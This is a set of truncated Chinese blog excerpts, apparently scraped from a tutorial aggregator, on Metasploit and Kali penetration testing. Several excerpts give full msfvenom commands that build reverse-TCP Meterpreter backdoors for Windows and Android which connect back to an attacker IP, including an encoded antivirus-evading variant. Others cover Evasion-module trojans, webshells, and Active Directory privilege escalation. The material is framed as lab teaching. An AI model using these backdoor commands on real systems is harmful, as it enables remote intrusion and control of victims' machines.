在攻击服务器上生成连接软件,LHOST为攻击机IP地址 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.52.133 LPORT=443 -f exe -o met.exe打开msfconsole控制台 将软件发给客户机上运行,此时kali上会有连接提示[mw_shl_code=applescript,true]root@qzwhost:~# msfconsole msfconsole > use exploit/multi/h…
环境 靶机 192.168.137.133 kali 192.168.137.135 步骤+ 生成后门 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.137.135 LPORT=50000 -f exe -o openme.exe msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' lhost=192.168.137.…
扫盲教程,大佬勿喷. 实验中请更改为你环境的IP. 生成apk后门 Kali Linux(Hack):192.168.169.76 Android(靶机):192.168.169.137 启动kali,开终端,生成apk后门.仅有9.2k的apk,也是蛮吊   root@kali:~# msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.169.76 lport=445 R > Desktop/123.apk No platform…
简介 几天前我说了kali这次更新我最关心的是metasploit升级到了5.0,5.0中有一个新的模块叫Evasion模块,这个模块可以轻松的创建反杀毒软件的木马,今天我们就来试一试 操作 首先打开metasploit msfconsole 你会看到下面这个界面 ➜ ~ msfconsole This copy of metasploit-framework is more than two weeks old. Consider running 'msfupdate' to update t…
利用Metasploit进行Linux提权 Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型的webshell ,通过生成webshell 然后设置监听器,访问webshell的url,幸运的话可以产生一个session,以便进一步利用.下面是具体的利用方法.我们可以通过指令查看msf里的payload 然后记住其位置:使用如下的指令来产生一个webshell,和前边将的msfpayload的用法类似,…
一.实验内容 1.使用kali进行靶机的漏洞扫描,利用metasploit选择其中的一个漏洞进行攻击,并获取权限. 2.分析攻击的原理以及获取了什么样的权限. 二.实验要求 1.熟悉kali原理和使用方法. 2.认真操作,详细记录实验过程和实验结果. 三.实验工具 笔记本电脑一台,安装parallels desktop虚拟机,安装kali和靶机系统windows10.另外安装了vmware虚拟机,安装kali和靶机系统windows2000. 四.实验步骤 (一)pd虚拟机下搭建渗透测试环境 1…
Active Directory中获取域管理员权限的攻击方法         译:by  backlion 0x00 前言 攻击者可以通过多种方式在Active Directory中获得域管理员权限, 这篇文章是为了描述当前使用的一些当前热门的内容, 这里描述的技术“假设违规”,攻击者已经在内部系统上获得权限,并获得域用户认证凭据(又称后渗透利用). 对于大多数企业而言,不幸的事实是,攻击者通常不会花更长时间从普通域用户转到域管理员.受害者的问题是:"这是怎么发生的?".攻击者经常以鱼…
前言 微软的Windows在企业或是个人应用领域占据着最大的市场份额,在渗透测试过程中你会经常遇到很多Windows的工作站和服务器.另一方面,大多数渗透测试人员主要使用基于Linux的发行版渗透测试系统,比如Kali Linux或者Pentoo和Backbox.因此你可能就需要有在Linux机器上快速编译Windows Exploit的能力.一款叫做"Mingw-w64"的软件可以解决这个问题. Mingw-w64 是一款用于创建Windows应用程序的开源开发环境.Mingw-w6…
Kail Linux渗透测试教程之在Metasploit中扫描 在Metasploit中扫描 在Metasploit中,附带了大量的内置扫描器.使用这些扫描器可以搜索并获得来自一台计算机或一个完整网络的服务信息.本节将介绍使用Metasploit中的辅助模块实现扫描. [实例4-4]在Metasploit中,扫描目标主机.具体操作步骤如下所示: (1)启动MSF终端.执行命令如下所示: root@kali:~# msfconsole msf> (2)搜索所有可用的扫描模块.执行命令如下所示: m…
基础配置 由于kali 2.0 已经没有metasploit 这个服务了,所以service metasploit start 的方式不起作用. 在kali 2.0中启动带数据库支持的MSF方式如下: 1 首先启动postgresql数据库: /etc/init.d/postgresql start:或者 service postgresql start: 2 初始化MSF数据库(关键步骤!):msfdb init:(如不能初始化,就用msfdb reinit试试吧!默认创建的数据库名:msf,…